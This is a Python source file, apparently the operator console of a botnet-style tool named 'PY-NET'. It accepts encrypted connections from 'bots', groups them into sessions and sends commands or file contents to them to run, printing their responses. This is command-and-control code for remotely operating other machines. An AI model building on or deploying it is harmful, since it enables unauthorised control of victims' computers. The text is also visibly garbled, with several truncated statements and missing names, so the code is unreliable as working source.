import subprocess import threading import argparse import uuid import sys import os from typing import Generator from typing import Sequence from typing import Optional from typing import Union from typing import Tuple from typing import Dict from typing import Any from shared import DEFAULT_HOSTNAME from shared import DEFAULT_PORT from shared import DEFAULT_ENCODING from shared import STRICT_ENCODING_ERRORS from shared import Platform from shared import AsymmetricSocket from shared import SymmetricSocket from shared import Socket hosts = {} class Console: if Platform.UNIX: ANSI_RED = '\033[31' ANSI_GREEN = '\033[32' ANSI_YELLOW = '\033[33' ANSI_BLUE = '\033[34' ANSI_PURPLE = '\033[35' ANSI_CYAN = '\033[36' ANSI_WHITE = '\033[37' ANSI_RESET = '\033[39m' else: ANSI_RED = '' ANSI_GREEN = '' ANSI_YELLOW = '' ANSI_BLUE = '' ANSI_PURPLE = '' ANSI_CYAN = '' ANSI_WHITE = '' ANSI_RESET = '' INFO = f'{ANSI_BLUE}[*]{ANSI_RESET} ' SUCCESS = f'{ANSI_GREEN}[+]{ANSI_RESET} ' WARNING = f'{ANSI_YELLOW}[!]{ANSI_RESET} ' DANGER = f'{ANSI_RED}[-]{ANSI_RESET} ' NULL = '' @staticmethod def write( obj: Any, prefix: str=INFO, *, color: str=ANSI_WHITE, suffix: str='', **kwargs ) -> None: print(f'{prefix}{color}{obj}{Console.ANSI_RESET}{suffix}\n', **kwargs) @staticmethod def table( rows: Sequence, *, headers: Sequence, prefix: str='', suffix: str='', separator: str='-', margin: str=' ' ) -> str: column_lengths = [] result = [prefix] for header in headers: column_lengths.append([len(str(header))]) for row in rows: for index, column in enumerate(row): column_lengths[index].append(len(str(column))) else: max_column_lengths = [] for column_length in column_lengths: max_column_lengths.append(max(column_length)) for index, header in enumerate(headers): result.append(str(header).ljust(max_column_lengths[index]) + margin) else: result.append('\n') for max_column_length in max_column_lengths: result.append(max_column_length * separator + margin) else: result.append('\n') for row in rows: for index, column in enumerate(row): result.append(str(column).ljust(max_column_lengths[index]) + margin) else: result.append('\n') else: result.append(suffix) return ''.join(result) @staticmethod def banner() -> str: return ('----------------------------------------------- __ \n' ' _____ __ __ _ _ ______ _______ w c(..)o (\n' ' | __ \\\\ \ / / | \ | || ____||__ __| \__(-) __)\n' ' | |__) |\ \_/ /______ | \| || |__ | | /\ (\n' ' | ___/ \ /|______|| . ` || __| | | /(_)___)\n' ' | | | | | |\ || |____ | | w /|\n' ' |_| |_| |_| \_||______| |_| | \\\n' '----------------------------------------------- m m') class Action: @staticmethod def args(*args, **kwargs) -> Generator[Any, None, None]: for arg, cast, default in args: if cast is bool: yield kwargs.get(arg) is not None else: value = kwargs.get(arg, default) if value == default: yield value else: yield cast(value) @staticmethod def exit(_) -> None: Console.write('May we meet in another process...', Console.NULL, end=Console.NULL) sys.exit() @staticmethod def cls(_) -> None: if Platform.UNIX: os.system('clear') else: os.system('cls') @staticmethod def list(_) -> None: if len(hosts) > 0: rows = [] for host_id, host in hosts.items(): rows.append((host_id, * for bot_id, bot in host.bots.items(): rows.append((bot_id, *bot.address())) else: table = Console.table(rows, Console.write(table, Console.NULL, end=Console.NULL) else: Console.write('NO HOSTS RUNNING', Console.WARNING) @staticmethod def listen(args: Dict[str, str]) -> None: hostname, port, password, salt, pubk, privk = Action.args(('hostname', str, DEFAULT_HOSTNAME), ('port', int, DEFAULT_PORT), ('password', str, None), ('salt', str, None), ('pubk', str, None), ('privk', str, None), **args) if password and salt: options = {'symmetric': True, 'password': password, 'salt': salt} elif pubk and privk: options = {'symmetric': False, 'public_key': pubk, 'private_key': privk} else: options = {} host = Host(hostname, port, **options) if is None: Console.write('HOST NOT STARTED', Console.DANGER) else: host_id = str(uuid.uuid4()) hosts[host_id] = host threading.Thread(target=host.listen, args=(host_id,), daemon=True).start() Console.write(f'HOST STARTED :: {}', Console.SUCCESS) @staticmethod def who(args: Dict[str, str]) -> None: id, = Action.args(('id', str, None), **args) assert id, f'Missing attribute: {id=}' who_conn = None for host_id, host in hosts.items(): if host_id == id: who_conn =; break else: if id in host.bots: who_conn = host.bots[id]; break if who_conn is None: Console.write(f'NO MATCHING ID FOUND :: {id}', Console.WARNING) else: rows, headers = who_conn.detailed_address() table = Console.table(rows, headers=headers) Console.write(table, Console.NULL, end=Console.NULL) @staticmethod def close(args: Dict[str, str]) -> None: id, = Action.args(('id', str, None), **args) assert id, f'Missing attribute: {id=}' conn_ids = [id.strip() for id in id.split(',') if id] for host_id, host in hosts.copy().items(): if host_id in conn_ids: for bot_id, bot in host.bots.copy().items(): Action._close_conn(bot_id, bot, host.bots) else: Action._close_conn(host_id,, hosts); conn_ids.remove(host_id) Console.write(f'HOST CLOSED :: {host_id}', Console.SUCCESS, end=Console.NULL) else: for bot_id, bot in host.bots.copy().items(): if bot_id in conn_ids: Action._close_conn(bot_id, bot, host.bots); conn_ids.remove(bot_id) Console.write(f'BOT CLOSED :: {bot_id}', Console.SUCCESS, end=Console.NULL) else: for conn_id in conn_ids: Console.write(f'NO MATCHING ID FOUND :: {conn_id}', Console.DANGER, end=Console.NULL) else: print() @staticmethod def session(args: Dict[str, str]) -> None: id, remove = Action.args(('id', str, None), ('remove', bool, None), **args) assert id, f'Missing attribute: {id=}' conn_ids = [id.strip() for id in id.split(',') if id] for host in hosts.values(): for conn_id in conn_ids: if conn_id in host.bots: bot = host.bots[conn_id] conn_ids.remove(conn_id) if bot.in_session: if remove: bot.in_session = False Console.write(f'BOT REMOVED FROM SESSION :: {id}', Console.SUCCESS, end=Console.NULL) else: Console.write(f'BOT ALREADY IN SESSION :: {id}', Console.WARNING, end=Console.NULL) else: if remove: Console.write(f'BOT NOT IN SESSION :: {id}', Console.WARNING, end=Console.NULL) else: bot.in_session = True Console.write(f'BOT JOINED SESSION :: {id}', Console.SUCCESS, end=Console.NULL) else: for conn_id in conn_ids: Console.write(f'BOT NOT FOUND :: {conn_id}', Console.DANGER, end=Console.NULL) else: print() @staticmethod def _close_conn( conn_id: str, conn: Union[Socket, SymmetricSocket, AsymmetricSocket], del_from: Dict[str, Union[Socket, SymmetricSocket, AsymmetricSocket]] ) -> None: conn.close() try: del del_from[conn_id] except KeyError: pass class Parse: COMMANDS = (('exit', Action.exit), ('cls', Action.cls), ('list', Action.list), ('listen', Action.listen), ('who', Action.who), ('close', Action.close), ('session', Action.session)) def input(self) -> None: Console.write(Console.banner(), Console.NULL, color=Console.ANSI_YELLOW) while True: try: command, args = self._parse() found_command = False for match, callback in self.COMMANDS: if command == match: callback(args) found_command = True; break if not found_command: run, filepath, history = Action.args(('run', bool, None), ('filepath', str, None), ('history', bool, None), **args) assert isinstance(run, bool), f'Wrong type: {run=}' assert isinstance(filepath, str) or filepath is None, f'Wrong type: {filepath=}' assert isinstance(history, bool), f'Wrong type: {history=}' if filepath: with open(filepath, 'r', encoding=DEFAULT_ENCODING, errors=STRICT_ENCODING_ERRORS) as rf: command = for host in hosts.values(): for bot_id, bot in host.bots.items(): if bot.in_session: try: request = {'request': command, 'run': run} if history: bot.send(request, self._send_callback) response = bot.recv(self._recv_callback) else: bot.send(request) response = bot.recv() except Exception: Action._close_conn(bot_id, bot, host.bots) raise else: response_text = response.get('response') if response_text: Console.write(response_text, Console.NULL) else: Console.write('Empty Response', Console.WARNING) except Exception as err: Console.write(f'[HOST] ERROR :: {err}', Console.NULL) def _parse(self) -> Tuple[str, Dict[str, str]]: try: command, *args = input('>>> ').split('--') except (EOFError, KeyboardInterrupt): sys.exit() else: return (command.strip(), dict(self._parse_args(args))) def _parse_args(self, args: Sequence) -> Generator[Tuple[str, str], None, None]: for arg in args: arg = arg.strip() if arg: key, *value = arg.split(' ') yield (key.rstrip(), ' '.join(value).lstrip()) @staticmethod def _send_callback(header_size: str, body_size: str, message_size: str) -> None: assert isinstance(header_size, str), f'Wrong type: {header_size=}' assert isinstance(body_size, str), f'Wrong type: {body_size=}' assert isinstance(message_size, str), f'Wrong type: {message_size=}' table = Console.table(((header_size, body_size, message_size),), headers=('Header Size', 'Body Size', 'Message Size')) Console.write(table, Console.NULL, end=Console.NULL) @staticmethod def _recv_callback(history: Sequence) -> None: assert isinstance(history, (list, tuple)), f'Wrong type: {history=}' table = Console.table(history, headers=('Buffer Size', 'Received Data', 'Message Size')) Console.write(table, Console.NULL, end=Console.NULL) class Host: def __init__( self, *args, symmetric: Optional[bool]=None, timeout: Union[int, float]=120, **kwargs ) -> None: assert isinstance(symmetric, bool) or symmetric is None, f'Wrong type: {symmetric=}' assert isinstance(timeout, (int, float)), f'Wrong type: {timeout=}' self.symmetric = symmetric self.timeout = timeout self.args = args self.kwargs = kwargs self.bots = {} if self.symmetric is None: = Socket(*self.args, server_side=True, is_host=True) elif self.symmetric: = SymmetricSocket(*self.args, server_side=True, is_host=True, **self.kwargs) else: = AsymmetricSocket(*self.args, server_side=True, is_host=True, **self.kwargs) def listen(self, host_id: str) -> None: try: with as host_conn: while True: try: bot_conn, (ip, port) = host_conn.accept() except OSError: continue bot_conn.settimeout(self.timeout) if self.symmetric is None: bot_conn = Socket(ip, port, conn=bot_conn, server_side=True) bot_conn.set_context() bot_conn.set_middleware() elif self.symmetric: bot_conn = SymmetricSocket(ip, port, conn=bot_conn, server_side=True, **self.kwargs) bot_conn.set_context() bot_conn.set_middleware() else: bot_conn = AsymmetricSocket(ip, port, conn=bot_conn, server_side=True, **self.kwargs) bot_conn.set_context() self.bots[str(uuid.uuid4())] = bot_conn except Exception: for bot_id, bot in self.bots.copy().items(): Action._close_conn(bot_id, bot, self.bots) else: Action._close_conn(host_id,, hosts) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--pubk_out') parser.add_argument('--privk_out') args = parser.parse_args() if args.pubk_out and args.privk_out: proc ='openssl', 'req', '-newkey', 'rsa:2048', '-nodes', '-keyout', args.privk_out, '-x509', '-days', '36500', '-out', args.pubk_out, '-batch'), encoding=DEFAULT_ENCODING, errors=STRICT_ENCODING_ERRORS, stdin=subprocess.DEVNULL, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) assert proc.returncode == 0, f'Wrong value: {proc.returncode=}' else: Parse().input()